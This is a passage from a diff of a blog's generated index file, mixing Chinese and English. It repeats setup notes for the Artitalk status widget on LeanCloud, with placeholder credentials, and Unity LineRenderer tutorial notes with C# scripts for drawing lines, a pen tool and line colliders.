    .cbp_tmlabel>div>p{
    margin-right: 25px;
    }
    .c2>center>p {
    margin : 10px 0;
    }
    #shuoshuo_edit {
    display: flex;
    }
    #artitalk_main .shuoshuo_text {
    margin: 0 auto;
    width: 95%;
    }
    </style>

    <center>居然被你找到了神秘的说说页!</center>

    ---

    <!-- 引用 artitalk -->
    <!--<script type="text/javascript" src="https://unpkg.com/artitalk"></script>-->

    <script type="text/javascript" src="Artitalk/dist/js/artitalk.js"></script>

    <!-- 存放说说的容器 -->
    <div id="artitalk_main"></div>
    <script>
    new Artitalk({
    appId: 'XXX', // Your LeanCloud appId
    appKey: 'XXX', // Your LeanCloud appKey
    serverURL: 'XXX',
    })
    </script>

appId, appKey, and serverURL can each be found in LeanCloud under 设置 - 应用凭证 (Settings → App Credentials), as the AppID, AppKey, and REST API server address.

Next, edit the contents of Artitalk.js: jsDelivr is blocked in mainland China, and the emoji images are fetched from there, so I had no choice but to download them locally and rewrite the URLs. While at it, I swapped Artitalk's logo for my own avatar, hehe~

There are also a few blocked, barely usable features; delete them~

    ]]>
+ Configuration

Configuration basically follows the steps in 使用文档 | Artitalk.js (I didn't set an avatar for the status posts). One caveat: the docs recommend the international edition of LeanCloud, which is blocked in mainland China, so that's a no-go! Use the China edition of LeanCloud instead.

Load Artitalk's JS locally from ArtitalkJS/Artitalk: 通过 leancloud 实现的可实时发布说说的 js (github.com); this makes it easier to tweak and avoids the blocking.

Usage: drop in the following HTML (I adjusted the CSS here to hide some blocked content, and reference the locally loaded Artitalk.js):

    <style>
    #artitalk_main ul#maina>li {
    margin: 0;
    }
    .delete_right>svg {
    transform: translateX(-8px);
    }
    #shuoshuo-modal>center, #userinfo>center, #chanshu>center, #shanchur>center {
    margin: 10px 0;
    }
    #artitalk_main .cbp_tmtimeline>li .cbp_tmlabel {
    margin: 0 0 20px 90px;
    }
    #artitalk_main .cbp_tmtimeline>li:before, #uploadSource, #loadEmoji {
    display: none !important;
    }
    #artitalk_main .cbp_tmtimeline>li .cbp_tmlabel>div>p, span.cbp_tmlabel>p, .shuoshuo_time {
    color: white;
    }
    .cbp_tmlabel>div>p{
    margin-right: 25px;
    }
    .c2>center>p {
    margin : 10px 0;
    }
    #shuoshuo_edit {
    display: flex;
    }
    #artitalk_main .shuoshuo_text {
    margin: 0 auto;
    width: 95%;
    }
    </style>

    <center>居然被你找到了神秘的说说页!</center>

    ---

    <!-- 引用 artitalk -->
    <!--<script type="text/javascript" src="https://unpkg.com/artitalk"></script>-->

    <script type="text/javascript" src="Artitalk/dist/js/artitalk.js"></script>

    <!-- 存放说说的容器 -->
    <div id="artitalk_main"></div>
    <script>
    new Artitalk({
    appId: 'XXX', // Your LeanCloud appId
    appKey: 'XXX', // Your LeanCloud appKey
    serverURL: 'XXX',
    })
    </script>

appId, appKey, and serverURL can each be found in LeanCloud under 设置 - 应用凭证 (Settings → App Credentials), as the AppID, AppKey, and REST API server address.

Next, edit the contents of Artitalk.js: jsDelivr is blocked in mainland China, and the emoji images are fetched from there, so I had no choice but to download them locally and rewrite the URLs. While at it, I swapped Artitalk's logo for my own avatar, hehe~

There are also a few blocked, barely usable features; delete them~

    ]]>
    @@ -2683,7 +2683,7 @@ /posts/Unity-LineRenderer/ - 正文

    How To Draw a Line in Unity | Line Renderer Tutorial 1


Add a LineRenderer component to a GameObject, set the point coordinates under Positions and the line material under Materials, and you can already draw lines in the scene.
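The same setup can be done from code; a minimal sketch of my own (the positions and material are placeholders):

using UnityEngine;

public class SimpleLine : MonoBehaviour
{
    void Start()
    {
        // Add and configure a LineRenderer entirely from script
        var lr = gameObject.AddComponent<LineRenderer>();
        lr.positionCount = 2;
        lr.SetPosition(0, Vector3.zero);
        lr.SetPosition(1, new Vector3(3f, 2f, 0f));
        lr.startWidth = 0.1f;
        lr.endWidth = 0.1f;
        lr.material = new Material(Shader.Find("Sprites/Default"));
    }
}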

Write a script whose SetupLine() draws a line through the positions of the given Transforms:

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class lr_LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private Transform[] points;

    private void Awake()
    {
    lr = GetComponent<LineRenderer>();
    }

    public void SetupLine(Transform[] points)
    {
    lr.positionCount = points.Length;
    this.points = points;
    }

    private void Update()
    {
    for(int i = 0; i < points.Length; i++)
    {
    lr.SetPosition(i, points[i].position);
    }
    }
    }

Then write another script to call SetupLine():

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class lr_Testing : MonoBehaviour
    {
    [SerializeField] private Transform[] points;
    [SerializeField] private lr_LineController line;

    private void Start()
    {
    line.SetupLine(points);
    }
    }

Assign a few Transforms to this lr_Testing and hit Play!


    How to Draw UI Lines in Unity in 10 Minutes | Line Renderer Tutorial 2


How do you draw lines on the UI layer? Set the Canvas's Render Mode to Screen Space - Camera.


The previous section's code then works on Transforms inside the Canvas.
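Set from code, the Canvas change looks roughly like this (a sketch; the script would sit on the Canvas object):

using UnityEngine;

public class UICanvasSetup : MonoBehaviour
{
    void Awake()
    {
        var canvas = GetComponent<Canvas>();
        canvas.renderMode = RenderMode.ScreenSpaceCamera; // instead of the default Overlay
        canvas.worldCamera = Camera.main;                 // camera that renders this canvas
    }
}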

    How to Draw Shapes in Unity | Line Renderer Unity Tutorial 3


Build the scene accordingly. Set up two canvases whose Render Mode is Screen Space - Camera: the Pen Tool Canvas and the Dots Canvas.


The Pen Tool is attached here; it controls the drawing logic.


The Pen Canvas is attached here; it represents the drawing surface.


The Dot Controller is attached here; it represents a point.


The Line Prefab is attached here; it represents a line.


A switch toggles the drawing mode (looped or not).

    using UnityEngine;
    using UnityEngine.UI;
    using UnityEngine.EventSystems;
    using System.Collections;
    using System;

    public class PenCanvas : MonoBehaviour, IPointerClickHandler {
    public Action OnPenCanvasLeftClickEvent;
    public Action OnPenCanvasRightClickEvent;
    void IPointerClickHandler.OnPointerClick(PointerEventData eventData) {
    if (eventData.pointerId == -1) {
    OnPenCanvasLeftClickEvent?.Invoke();
    }
    else if (eventData.pointerId == -2) {
    OnPenCanvasRightClickEvent?.Invoke();
    }
    }
    }

This Unity script defines PenCanvas, which implements the IPointerClickHandler interface to handle clicks on the canvas. Its main features:

1. It declares two events, OnPenCanvasLeftClickEvent and OnPenCanvasRightClickEvent, representing left and right clicks on the canvas.
2. It implements OnPointerClick from IPointerClickHandler: when the user clicks the canvas, the pointerId in eventData distinguishes a left click (-1) from a right click (-2), and the matching event is invoked.

In short, the script listens for left and right clicks on the canvas and forwards them as events.

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private List<DotController> dots;

    private void Awake() {
    lr = GetComponent<LineRenderer>();
    lr.positionCount = 0;

    dots = new List<DotController>();
    }

    public DotController GetFirstPoint() {
    return dots[0];
    }

    public void AddDot(DotController dot) {

    dot.SetLine(this);
    dot.SetIndex(dots.Count);

    lr.positionCount++;
    dots.Add(dot);
    }

    public void SplitPointsAtIndex(int index, out List<DotController> beforePoints, out List<DotController> afterPoints) {
    List<DotController> before = new List<DotController>();
    List<DotController> after = new List<DotController>();

    int i = 0;
    for (; i < index; i++) {
    before.Add(dots[i]);
    }
    i++;
    for (; i < dots.Count; i++) {
    after.Add(dots[i]);
    }

    beforePoints = before;
    afterPoints = after;

    dots.RemoveAt(index);
    }

    public void SetColor(Color color) {
    lr.startColor = color;
    lr.endColor = color;
    }

    public void ToggleLoop() {
    lr.loop = !lr.loop;
    }

    public bool isLooped() {
    return lr.loop;
    }

    private void LateUpdate() {
    if (dots.Count >= 2) {
    for (int i = 0; i < dots.Count; i++) {
    Vector3 position = dots[i].transform.position;
    position += new Vector3(0, 0, 5);

    lr.SetPosition(i, position);
    }
    }
    }
    }

This LineController script controls a line's behavior. Its main features:

1. Awake initializes the LineRenderer and the dot list, and sets the initial position count to 0.
2. GetFirstPoint returns the first dot on the line.
3. AddDot adds a dot to the line: it records the dot's owning line and index, then grows the LineRenderer's position count and the dot list.
4. SplitPointsAtIndex splits the dots at a given index, returns the two halves, and removes the dot at that index.
5. SetColor sets the line's color.
6. ToggleLoop and isLooped toggle and query whether the line is closed.
7. LateUpdate copies each dot's position into the LineRenderer so the line follows the dots as they move.

Overall, the script manages a single line object: updating its positions, adding and splitting dots, and setting its color and loop state.

    using UnityEngine;
    using UnityEngine.UI;
    using UnityEngine.EventSystems;
    using System.Collections;
    using System;
    public class DotController : MonoBehaviour, IDragHandler, IPointerClickHandler, IBeginDragHandler {

    [HideInInspector] public LineController line;
    [HideInInspector] public int index;

    public Action<DotController> OnDragEvent;
    public void OnDrag(PointerEventData eventData) {
    OnDragEvent?.Invoke(this);
    }

    public Action<DotController> OnRightClickEvent;
    public Action<LineController> OnLeftClickEvent;
    public void OnPointerClick(PointerEventData eventData) {
    if (eventData.pointerId == -2) {
    //Right Click
    OnRightClickEvent?.Invoke(this);
    }
    else if (eventData.pointerId == -1) {
    //Left Click
    OnLeftClickEvent?.Invoke(line);
    }
    }

    public void SetLine(LineController line) {
    this.line = line;
    }

    public void SetIndex(int index) {
    this.index = index;
    }

    public void OnBeginDrag(PointerEventData eventData) {
    if (eventData.pointerId == -1) {
    //Left Drag
    OnLeftClickEvent?.Invoke(line);
    }
    }
    }

This DotController script controls a point's behavior. Its main features:

1. It implements the IDragHandler, IPointerClickHandler, and IBeginDragHandler interfaces to handle the dot's drag, click, and drag-start events.
2. The public field line stores the LineController the dot belongs to.
3. The public field index stores the dot's position within its line.
4. It exposes three events, OnDragEvent, OnRightClickEvent, and OnLeftClickEvent, for drag, right-click, and left-click handling.
5. OnDrag fires OnDragEvent while the dot is being dragged.
6. OnPointerClick fires the right- or left-click event depending on which mouse button was used.
7. SetLine assigns the dot's owning line.
8. SetIndex assigns the dot's index within the line.
9. OnBeginDrag fires the left-click event when a left drag starts, making the dot's line the active one.

Overall, the script manages a dot's interactions (drag, click, drag-start) along with its link back to a line and its index.

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class PenTool : MonoBehaviour
    {
    [Header("Pen Canvas")]
    [SerializeField] private PenCanvas penCanvas;

    [Header("Dots")]
    [SerializeField] private GameObject dotPrefab;
    [SerializeField] private Transform dotParent;

    [Header("Lines")]
    [SerializeField] private GameObject linePrefab;
    [SerializeField] private Transform lineParent;
    private LineController currentLine;

    [Header("Colors")]
    [SerializeField] private Color activeColor;
    [SerializeField] private Color normalColor;

    [Header("Loop Toggle")]
    [SerializeField] Image loopToggle;
    [SerializeField] Sprite loopSprite;
    [SerializeField] Sprite unloopSprite;

    private void Start() {
    penCanvas.OnPenCanvasLeftClickEvent += AddDot;
    penCanvas.OnPenCanvasRightClickEvent += EndCurrentLine;
    }

    public void ToggleLoop() {
    if (currentLine != null) {
    currentLine.ToggleLoop();
    loopToggle.sprite = (currentLine.isLooped()) ? unloopSprite : loopSprite;
    }
    }

    private void AddDot() {
    if (currentLine == null) {
    LineController lineController = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    SetCurrentLine(lineController);
    }

    DotController dot = Instantiate(dotPrefab, GetMousePosition(), Quaternion.identity, dotParent).GetComponent<DotController>();
    dot.OnDragEvent += MoveDot;
    dot.OnRightClickEvent += RemoveDot;
    dot.OnLeftClickEvent += SetCurrentLine;

    currentLine.AddDot(dot);
    }

    private void RemoveDot(DotController dot) {
    dot.line.SplitPointsAtIndex(dot.index, out List<DotController> before, out List<DotController> after);

    Destroy(dot.line.gameObject);
    Destroy(dot.gameObject);

    LineController beforeLine = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    for (int i = 0; i < before.Count; i++) {
    beforeLine.AddDot(before[i]);
    }

    LineController afterLine = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    for (int i = 0; i < after.Count; i++) {
    afterLine.AddDot(after[i]);
    }
    }

    private void EndCurrentLine() {
    if (currentLine != null) {
    currentLine.SetColor(normalColor);
    loopToggle.enabled = false;
    currentLine = null;
    }
    }

    private void SetCurrentLine(LineController newLine) {
    EndCurrentLine();

    currentLine = newLine;
    currentLine.SetColor(activeColor);

    loopToggle.enabled = true;
    loopToggle.sprite = (currentLine.isLooped()) ? unloopSprite : loopSprite;
    }

    private void MoveDot(DotController dot) {
    dot.transform.position = GetMousePosition();
    }

    private Vector3 GetMousePosition() {
    Vector3 worldMousePosition = Camera.main.ScreenToWorldPoint(Input.mousePosition);
    worldMousePosition.z = 0;

    return worldMousePosition;
    }
    }

    这段代码是一个 Unity 脚本,名为 PenTool,用于实现一个绘图工具的功能。主要包括以下内容:

1. Start 方法中订阅了 PenCanvas 的左键点击事件和右键点击事件,分别触发 AddDot 和 EndCurrentLine 方法。
    2. ToggleLoop 方法用于切换当前线条是否闭合,并更新对应的 UI 图标。
    3. AddDot 方法用于在画布上添加一个点,并将点添加到当前线条中。
    4. RemoveDot 方法用于移除指定的点,并重新生成两个新的线条来连接剩余的点。
    5. EndCurrentLine 方法用于结束当前线条的绘制,并重置相关状态。
    6. SetCurrentLine 方法用于设置当前操作的线条,并更新相关状态。
    7. MoveDot 方法用于移动点的位置到鼠标位置。
    8. GetMousePosition 方法用于获取鼠标在世界坐标系中的位置。

    整体来说,这个脚本实现了绘图工具的核心功能,包括点和线条的创建、操作以及相关 UI 的更新。

    How to Detect COLLISIONS on a Line Renderer in Unity

    ​给 Line Prefab 绑上两个脚本:

    png

    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;

    [RequireComponent(typeof(LineController), typeof(PolygonCollider2D))]
    public class LineCollision : MonoBehaviour {

    LineController lineController;
    PolygonCollider2D polygonCollider;

    private void Awake() {
    lineController = GetComponent<LineController>();
    polygonCollider = GetComponent<PolygonCollider2D>();
    }

    private void LateUpdate() {

    //Get all the positions from the line renderer
    Vector3[] positions = lineController.GetPositions();

    //If we have enough points to draw a line
    if (positions.Count() >= 2) {

    //Get the number of line between two points
    int numberOfLines = positions.Length - 1;

    //Make as many paths for each different line as we have lines
    polygonCollider.pathCount = numberOfLines;

    //Get Collider points between two consecutive points
    for (int i = 0; i < numberOfLines; i++) {
    //Get the two next points
    List<Vector2> currentPositions = new List<Vector2> {
    positions[i],
    positions[i+1]
    };

    List<Vector2> currentColliderPoints = CalculateColliderPoints(currentPositions);
    polygonCollider.SetPath(i, currentColliderPoints.ConvertAll(p => (Vector2)transform.InverseTransformPoint(p)));
    }
    }
    else {

    polygonCollider.pathCount = 0;
    }
    }

    private List<Vector2> CalculateColliderPoints(List<Vector2> positions) {
    //Get The Width of the Line
    float width = lineController.GetWidth();

    // m = (y2 - y1) / (x2 - x1)
    float m = (positions[1].y - positions[0].y) / (positions[1].x - positions[0].x);
    float deltaX = (width / 2f) * (m / Mathf.Pow(m * m + 1, 0.5f));
    float deltaY = (width / 2f) * (1 / Mathf.Pow(1 + m * m, 0.5f));

    //Calculate Vertex Offset from Line Point
    Vector2[] offsets = new Vector2[2];
    offsets[0] = new Vector2(-deltaX, deltaY);
    offsets[1] = new Vector2(deltaX, -deltaY);

    List<Vector2> colliderPoints = new List<Vector2> {
    positions[0] + offsets[0],
    positions[1] + offsets[0],
    positions[1] + offsets[1],
    positions[0] + offsets[1]
    };

    return colliderPoints;
    }
    }
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private List<DotController> dots;

    private void Awake() {
    lr = GetComponent<LineRenderer>();
    lr.positionCount = 0;

    dots = new List<DotController>();
    }

    public DotController GetFirstPoint() {
    return dots[0];
    }

    public void AddDot(DotController dot) {

    dot.SetLine(this);
    dot.SetIndex(dots.Count);

    lr.positionCount++;
    dots.Add(dot);
    }

    public void SplitPointsAtIndex(int index, out List<DotController> beforePoints, out List<DotController> afterPoints) {
    List<DotController> before = new List<DotController>();
    List<DotController> after = new List<DotController>();

    int i = 0;
    for (; i < index; i++) {
    before.Add(dots[i]);
    }
    i++;
    for (; i < dots.Count; i++) {
    after.Add(dots[i]);
    }

    beforePoints = before;
    afterPoints = after;

    dots.RemoveAt(index);
    }

    public void SetColor(Color color) {
    lr.startColor = color;
    lr.endColor = color;
    }

    public void ToggleLoop() {
    lr.loop = !lr.loop;
    }

    public bool isLooped() {
    return lr.loop;
    }

    private void LateUpdate() {
    if (dots.Count >= 2) {
    for (int i = 0; i < dots.Count; i++) {
    Vector3 position = dots[i].transform.position;
    position += new Vector3(0, 0, 5);

    lr.SetPosition(i, position);
    }
    }
    }

    public Vector3[] GetPositions() {
    Vector3[] positions = new Vector3[lr.positionCount];
    lr.GetPositions(positions);
    return positions;
    }

    public float GetWidth() {
    return lr.startWidth;
    }
    }

    ​如此,生成线条时就会附带对应的碰撞体。

    ]]>
    + 正文

    How To Draw a Line in Unity | Line Renderer Tutorial 1

    png

    ​往一个 GameObject 里加上 LineRenderer 组件,Positions 里设好坐标点的坐标,Materials 里设好线条的材质,即可在游戏场景里画线。

    ​写一个脚本,SetupLine() 功能是在 Transform 的坐标处连线:

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class lr_LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private Transform[] points;

    private void Awake()
    {
    lr = GetComponent<LineRenderer>();
    }

    public void SetupLine(Transform[] points)
    {
    lr.positionCount = points.Length;
    this.points = points;
    }

    private void Update()
    {
    if (points == null) return; // SetupLine() 尚未调用时跳过,避免空引用

    for(int i = 0; i < points.Length; i++)
    {
    lr.SetPosition(i, points[i].position);
    }
    }
    }

    ​再写一个脚本调用 SetupLine()

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class lr_Testing : MonoBehaviour
    {
    [SerializeField] private Transform[] points;
    [SerializeField] private lr_LineController line;

    private void Start()
    {
    line.SetupLine(points);
    }
    }

    ​给这个 lr_Testing 绑定若干 Transform,开跑!

    png

    How to Draw UI Lines in Unity in 10 Minutes | Line Renderer Tutorial 2

    png

    ​如何在 UI 层画线?将 Canvas 里的 Render Mode 设为 Screen Space - Camera

    png

    ​上一节的代码就可以对 Canvas 里的 Transform 生效。

    How to Draw Shapes in Unity | Line Renderer Unity Tutorial 3

    png

    ​构建场景如图所示。设计两个 Render Mode 为 Screen Space - Camera 的画布:Pen Tool Canvas 和 Dots Canvas。

    png

    ​绑定着 Pen Tool,控制画线的逻辑。

    png

    ​绑定着 Pen Canvas,表示画布。

    png

    ​绑定着 Dot Controller,表示点。

    png

    ​绑定着 Line Prefab,表示线条。

    png

    ​切换绘制模式(是否 loop)的开关。

    using UnityEngine;
    using UnityEngine.UI;
    using UnityEngine.EventSystems;
    using System.Collections;
    using System;

    public class PenCanvas : MonoBehaviour, IPointerClickHandler {
    public Action OnPenCanvasLeftClickEvent;
    public Action OnPenCanvasRightClickEvent;
    void IPointerClickHandler.OnPointerClick(PointerEventData eventData) {
    if (eventData.pointerId == -1) {
    OnPenCanvasLeftClickEvent?.Invoke();
    }
    else if (eventData.pointerId == -2) {
    OnPenCanvasRightClickEvent?.Invoke();
    }
    }
    }

    这段 Unity 代码定义了一个名为 PenCanvas 的脚本,实现了 IPointerClickHandler 接口,用于处理在画布上的点击事件。主要功能如下:

    1. 定义了两个事件 OnPenCanvasLeftClickEvent 和 OnPenCanvasRightClickEvent,分别对应在画布上的左键点击和右键点击。
    2. 实现了 IPointerClickHandler 接口中的 OnPointerClick 方法,用于处理点击事件。当用户在画布上点击时,根据 eventData 中的 pointerId 判断点击的是左键(-1)还是右键(-2),然后触发相应的事件处理函数。

    这段代码的作用是在 Unity 中实现了对画布上左键和右键点击事件的监听,并在点击事件发生时触发相应的事件处理函数。
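    顺带一提,pointerId 为 -1/-2 是鼠标左键/右键的约定值;若不想用魔法数字,也可以改用 eventData.button 判断,下面是一个等价的示意写法(非原教程代码):

    void IPointerClickHandler.OnPointerClick(PointerEventData eventData) {
    //Left Click
    if (eventData.button == PointerEventData.InputButton.Left) {
    OnPenCanvasLeftClickEvent?.Invoke();
    }
    //Right Click
    else if (eventData.button == PointerEventData.InputButton.Right) {
    OnPenCanvasRightClickEvent?.Invoke();
    }
    }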

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private List<DotController> dots;

    private void Awake() {
    lr = GetComponent<LineRenderer>();
    lr.positionCount = 0;

    dots = new List<DotController>();
    }

    public DotController GetFirstPoint() {
    return dots[0];
    }

    public void AddDot(DotController dot) {

    dot.SetLine(this);
    dot.SetIndex(dots.Count);

    lr.positionCount++;
    dots.Add(dot);
    }

    public void SplitPointsAtIndex(int index, out List<DotController> beforePoints, out List<DotController> afterPoints) {
    List<DotController> before = new List<DotController>();
    List<DotController> after = new List<DotController>();

    int i = 0;
    for (; i < index; i++) {
    before.Add(dots[i]);
    }
    i++;
    for (; i < dots.Count; i++) {
    after.Add(dots[i]);
    }

    beforePoints = before;
    afterPoints = after;

    dots.RemoveAt(index);
    }

    public void SetColor(Color color) {
    lr.startColor = color;
    lr.endColor = color;
    }

    public void ToggleLoop() {
    lr.loop = !lr.loop;
    }

    public bool isLooped() {
    return lr.loop;
    }

    private void LateUpdate() {
    if (dots.Count >= 2) {
    for (int i = 0; i < dots.Count; i++) {
    Vector3 position = dots[i].transform.position;
    position += new Vector3(0, 0, 5);

    lr.SetPosition(i, position);
    }
    }
    }
    }

    这段代码是一个名为 LineController 的 Unity 脚本,用于控制线条的行为。主要功能包括:

    1. Awake 方法中初始化 LineRenderer 和点列表,并设置初始位置数为 0
    2. 提供了 GetFirstPoint 方法来获取线条上的第一个点。
    3. 提供了 AddDot 方法,用于向线条中添加点。该方法会设置点的索引,并更新 LineRenderer 的位置数和点列表。
    4. 提供了 SplitPointsAtIndex 方法,用于在指定索引处分割线条上的点,并返回分割后的两部分点列表。
    5. 提供了 SetColor 方法,用于设置线条的颜色。
    6. 提供了 ToggleLoop 方法和 isLooped 方法,用于切换线条是否闭合的状态,并获取当前线条是否闭合的状态。
    7. LateUpdate 方法中,根据点的位置更新 LineRenderer 的位置,以确保线条能够实时跟随点的移动而更新。

    总体来说,这个脚本负责管理线条对象的行为,包括线条位置的更新、点的添加和删除、线条颜色的设置等功能。

    using UnityEngine;
    using UnityEngine.UI;
    using UnityEngine.EventSystems;
    using System.Collections;
    using System;
    public class DotController : MonoBehaviour, IDragHandler, IPointerClickHandler, IBeginDragHandler {

    [HideInInspector] public LineController line;
    [HideInInspector] public int index;

    public Action<DotController> OnDragEvent;
    public void OnDrag(PointerEventData eventData) {
    OnDragEvent?.Invoke(this);
    }

    public Action<DotController> OnRightClickEvent;
    public Action<LineController> OnLeftClickEvent;
    public void OnPointerClick(PointerEventData eventData) {
    if (eventData.pointerId == -2) {
    //Right Click
    OnRightClickEvent?.Invoke(this);
    }
    else if (eventData.pointerId == -1) {
    //Left Click
    OnLeftClickEvent?.Invoke(line);
    }
    }

    public void SetLine(LineController line) {
    this.line = line;
    }

    public void SetIndex(int index) {
    this.index = index;
    }

    public void OnBeginDrag(PointerEventData eventData) {
    if (eventData.pointerId == -1) {
    //Left Drag
    OnLeftClickEvent?.Invoke(line);
    }
    }
    }

    这段代码是一个名为 DotController 的 Unity 脚本,用于控制点的行为。主要功能包括:

    1. 实现了 IDragHandler、IPointerClickHandler、IBeginDragHandler 接口,以处理点的拖拽、鼠标点击和开始拖拽事件。
    2. 包含了一个公开的字段 line,用于存储点所属的线条对象。
    3. 包含了一个公开的字段 index,用于存储点在线条中的索引。
    4. 包含了 OnDragEvent、OnRightClickEvent、OnLeftClickEvent 三个事件,分别用于处理拖拽事件、右键点击事件和左键点击事件。
    5. 实现了 OnDrag 方法,用于在点被拖拽时触发相应的事件。
    6. 实现了 OnPointerClick 方法,根据鼠标点击的类型(左键或右键)来触发相应的事件。
    7. 实现了 SetLine 方法,用于设置点所属的线条对象。
    8. 实现了 SetIndex 方法,用于设置点在线条中的索引。
    9. 实现了 OnBeginDrag 方法,在开始拖拽事件中根据鼠标点击的类型来触发相应的事件。

    总体来说,这个脚本负责管理点对象的交互行为,包括拖拽、点击和开始拖拽事件的处理,以及与线条对象的关联和索引设置。

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class PenTool : MonoBehaviour
    {
    [Header("Pen Canvas")]
    [SerializeField] private PenCanvas penCanvas;

    [Header("Dots")]
    [SerializeField] private GameObject dotPrefab;
    [SerializeField] private Transform dotParent;

    [Header("Lines")]
    [SerializeField] private GameObject linePrefab;
    [SerializeField] private Transform lineParent;
    private LineController currentLine;

    [Header("Colors")]
    [SerializeField] private Color activeColor;
    [SerializeField] private Color normalColor;

    [Header("Loop Toggle")]
    [SerializeField] Image loopToggle;
    [SerializeField] Sprite loopSprite;
    [SerializeField] Sprite unloopSprite;

    private void Start() {
    penCanvas.OnPenCanvasLeftClickEvent += AddDot;
    penCanvas.OnPenCanvasRightClickEvent += EndCurrentLine;
    }

    public void ToggleLoop() {
    if (currentLine != null) {
    currentLine.ToggleLoop();
    loopToggle.sprite = (currentLine.isLooped()) ? unloopSprite : loopSprite;
    }
    }

    private void AddDot() {
    if (currentLine == null) {
    LineController lineController = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    SetCurrentLine(lineController);
    }

    DotController dot = Instantiate(dotPrefab, GetMousePosition(), Quaternion.identity, dotParent).GetComponent<DotController>();
    dot.OnDragEvent += MoveDot;
    dot.OnRightClickEvent += RemoveDot;
    dot.OnLeftClickEvent += SetCurrentLine;

    currentLine.AddDot(dot);
    }

    private void RemoveDot(DotController dot) {
    dot.line.SplitPointsAtIndex(dot.index, out List<DotController> before, out List<DotController> after);

    Destroy(dot.line.gameObject);
    Destroy(dot.gameObject);

    LineController beforeLine = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    for (int i = 0; i < before.Count; i++) {
    beforeLine.AddDot(before[i]);
    }

    LineController afterLine = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    for (int i = 0; i < after.Count; i++) {
    afterLine.AddDot(after[i]);
    }
    }

    private void EndCurrentLine() {
    if (currentLine != null) {
    currentLine.SetColor(normalColor);
    loopToggle.enabled = false;
    currentLine = null;
    }
    }

    private void SetCurrentLine(LineController newLine) {
    EndCurrentLine();

    currentLine = newLine;
    currentLine.SetColor(activeColor);

    loopToggle.enabled = true;
    loopToggle.sprite = (currentLine.isLooped()) ? unloopSprite : loopSprite;
    }

    private void MoveDot(DotController dot) {
    dot.transform.position = GetMousePosition();
    }

    private Vector3 GetMousePosition() {
    Vector3 worldMousePosition = Camera.main.ScreenToWorldPoint(Input.mousePosition);
    worldMousePosition.z = 0;

    return worldMousePosition;
    }
    }

    这段代码是一个 Unity 脚本,名为 PenTool,用于实现一个绘图工具的功能。主要包括以下内容:

    1. Start 方法中订阅了 PenCanvas 的左键点击事件和右键点击事件,分别触发 AddDot 和 EndCurrentLine 方法。
    2. ToggleLoop 方法用于切换当前线条是否闭合,并更新对应的 UI 图标。
    3. AddDot 方法用于在画布上添加一个点,并将点添加到当前线条中。
    4. RemoveDot 方法用于移除指定的点,并重新生成两个新的线条来连接剩余的点。
    5. EndCurrentLine 方法用于结束当前线条的绘制,并重置相关状态。
    6. SetCurrentLine 方法用于设置当前操作的线条,并更新相关状态。
    7. MoveDot 方法用于移动点的位置到鼠标位置。
    8. GetMousePosition 方法用于获取鼠标在世界坐标系中的位置。

    整体来说,这个脚本实现了绘图工具的核心功能,包括点和线条的创建、操作以及相关 UI 的更新。

    How to Detect COLLISIONS on a Line Renderer in Unity

    ​给 Line Prefab 绑上两个脚本:

    png

    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;

    [RequireComponent(typeof(LineController), typeof(PolygonCollider2D))]
    public class LineCollision : MonoBehaviour {

    LineController lineController;
    PolygonCollider2D polygonCollider;

    private void Awake() {
    lineController = GetComponent<LineController>();
    polygonCollider = GetComponent<PolygonCollider2D>();
    }

    private void LateUpdate() {

    //Get all the positions from the line renderer
    Vector3[] positions = lineController.GetPositions();

    //If we have enough points to draw a line
    if (positions.Count() >= 2) {

    //Get the number of line between two points
    int numberOfLines = positions.Length - 1;

    //Make as many paths for each different line as we have lines
    polygonCollider.pathCount = numberOfLines;

    //Get Collider points between two consecutive points
    for (int i = 0; i < numberOfLines; i++) {
    //Get the two next points
    List<Vector2> currentPositions = new List<Vector2> {
    positions[i],
    positions[i+1]
    };

    List<Vector2> currentColliderPoints = CalculateColliderPoints(currentPositions);
    polygonCollider.SetPath(i, currentColliderPoints.ConvertAll(p => (Vector2)transform.InverseTransformPoint(p)));
    }
    }
    else {

    polygonCollider.pathCount = 0;
    }
    }

    private List<Vector2> CalculateColliderPoints(List<Vector2> positions) {
    //Get The Width of the Line
    float width = lineController.GetWidth();

    // m = (y2 - y1) / (x2 - x1)
    float m = (positions[1].y - positions[0].y) / (positions[1].x - positions[0].x);
    float deltaX = (width / 2f) * (m / Mathf.Pow(m * m + 1, 0.5f));
    float deltaY = (width / 2f) * (1 / Mathf.Pow(1 + m * m, 0.5f));

    //Calculate Vertex Offset from Line Point
    Vector2[] offsets = new Vector2[2];
    offsets[0] = new Vector2(-deltaX, deltaY);
    offsets[1] = new Vector2(deltaX, -deltaY);

    List<Vector2> colliderPoints = new List<Vector2> {
    positions[0] + offsets[0],
    positions[1] + offsets[0],
    positions[1] + offsets[1],
    positions[0] + offsets[1]
    };

    return colliderPoints;
    }
    }
